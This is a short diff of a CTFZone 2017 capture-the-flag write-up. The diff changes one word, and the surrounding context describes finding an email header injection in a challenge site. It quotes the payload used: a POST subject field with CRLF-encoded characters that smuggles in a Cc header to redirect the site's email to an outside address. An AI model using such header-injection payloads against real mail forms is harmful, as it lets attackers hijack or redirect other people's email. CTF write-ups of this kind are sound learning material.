tnmch/Write_Up_Ctf/CTFZone 2017/Mr.Future President Blog.md

 here me and my team start think about phpmailer bug , but not work after some test

-then after some check we get that its email header injection that make us able to redirect the email to our account :D look amazing new here :D
+then after some check we get that its email header injection that make us able to redirect the email to our account :D look amazing now here :D

 this is our payload used :
 POST : subject=Report+from+16-07-2017+12-18%0d%0aCc:email@gmail.com%0d%0a&encoding=UTF-8